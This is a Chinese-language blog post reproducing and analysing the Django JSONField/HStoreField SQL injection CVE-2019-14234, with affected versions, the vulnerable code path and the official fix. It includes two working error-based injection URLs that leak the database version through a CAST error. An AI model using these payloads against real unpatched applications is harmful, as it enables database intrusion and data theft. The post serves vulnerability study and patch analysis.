Django JSONField/HStoreField SQL 注入漏洞(CVE-2019-14234)的复现与分析

Rivaill  1892天前

漏洞描述

当使用用户可控的数据作为参数,以 **kwargs 的形式传入 QuerySet.filter() 函数,对 django.contrib.postgres.fields.JSONField 进行键/索引查找,或对 django.contrib.postgres.fields.HStoreField 进行键查找时,将会导致 SQL 注入。

影响范围

  • Django 主开发分支
  • Django 2.2.x < 2.2.4
  • Django 2.1.x < 2.1.11
  • Django 1.11.x < 1.11.23

环境搭建

  • Python 2.7.10
  • Postgresql(docker)
  • 漏洞demo
    漏洞代码片段:

WeChat3cb9e2b326fb1532769a89d326964c16.png为了触发漏洞,将http get里面的参数字典以函数参数的形式传过去,**的作用就是可以将字典转为函数参数,例如filter(**{'a':'1','b':'2'})与filter(a=1,b=2)是等价的

漏洞复现

MD5 PoC:

http://127.0.0.1:8000/select?info__test%27+%3d+%27%22a%22%27)%20and%207778%3dCAST((SELECT%20md5(version()))::text%20AS%20NUMERIC)--

WeChatb06355bcb83454b7fb46967c3555c6af.png

Version EXP:

http://127.0.0.1:8000/select?info__test%27+%3d+%27%22a%22%27)%20and%207778%3dCAST((SELECT%20version())::text%20AS%20NUMERIC)--

WeChat9caa1daa50de34615f29ade51a4b5436.png

原理分析

先看看官方补丁,定位到关键代码处:

WeChat17ca800cd690b01c05a29616436e464b.png定位到该函数 as_sql(jsonb.py:L97):

WeChat08d99ed5f48479cdcc28a2efe28cfb9c.png

通过函数名推测该函数是用来生产相关SQL语句的,后来查了一下,这个函数主要是为filter()函数提供json查询支持。

举个例子:现在数据库里存了一些这样的数据

WeChat655f78933944ffbc98879bcaa00f1aa3.png如果我要查info字段里面json数据里name键为rivaill2的数据就可以用如下代码去查

XXXmodel.ob jects.filter(info__name='rivaill1')

最终上面的as_sql会生成如下一段SQL:

WeChat00a2b1c978abf8ea96be39dc195da0ae.png这是postgresql进行json查询的语法

WeChat54bed28bf35b1df4989b3f0958e09e54.png再回来看看存在漏洞的代码:

WeChat655f99c248f2a07fedad6276061c1792.png大概的代码逻辑就是会将key强转一下,如果强转不成功就在两侧加个单引号,但是这里面没有经过任何过滤,追踪整个调用链也没有发现针对这个key的过滤,然后将字段名、操作符、key拼接了一下就return出去了。

所以这里的注入点实际上是在json的key里面,想要这个输入点可控就需要filter函数中的参数key可控,这也是为什么demo中要将http get以**kwargs 的形式传入filter函数的原因。

测试一下:

WeChatb154480e33c365012d7357b2d98ca476.png

可以看到确实可控了,info是指定的字段,name是info字段的json数据中的key,最终解析到filter函数里面就是filter(info__name='rivaill2')

往key后面加个单引号就能触发注入

WeChat5e21d7c5500e229fc8e6128dfc778d97.png


修复措施

看一下官方的补丁:

WeChat60be8a25e6bfc5e3f753dd425ca0d807.png其实关键就在最后一行,lookup(也就是key)没有直接与前面的字段名和操作符拼接了,而是放到了第二个返回值里面和params拼接,最后追踪了一下调用链发现第二个返回值里面的数据都会作为参数化查询的value被代入进去,这样就避免了注入。

最新评论

昵称
邮箱
提交评论